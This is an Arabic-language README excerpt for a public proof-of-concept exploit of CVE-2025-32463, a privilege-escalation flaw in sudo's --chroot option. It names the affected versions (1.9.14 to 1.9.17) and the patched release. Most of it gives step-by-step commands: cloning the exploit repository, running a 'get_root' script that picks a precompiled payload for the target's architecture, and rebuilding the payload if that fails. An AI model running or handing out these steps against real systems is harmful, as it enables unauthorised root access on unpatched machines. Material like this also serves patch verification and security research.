
- الثغرة: sudo 1.9.14، 1.9.15، 1.9.16، 1.9.17 - تم التصحيح في: sudo 1.9.17p1 والإصدارات الأحدث - الإصدارات القديمة الأقدم من 1.9.14 غير متأثرة، لأنها لا تدعم خيار --chroot.
# get_root.sh و get_root.py يقومان بنفس الشيء.
git clone https://github.com/shazed-x/CVE-2025-32463
cd CVE-2025-32463
./get_root.sh
لا يتطلب وجود gcc على الجهاز المستهدف. يعمل الـ PoC عن طريق التحقق من البنية الحالية (مثل x86_64, aarch64)، ثم تنفيذ الحمولة المترجمة مسبقًا ديناميكيًا المقابلة. إذا فشل ذلك، فإنه يعود إلى الحمولة الثابتة.
إذا فشل الاستغلال على جهازك، يمكنك تجميعه باستخدام:
./mkall-dynamic.sh
# ثم قم بتشغيل
./get_root.sh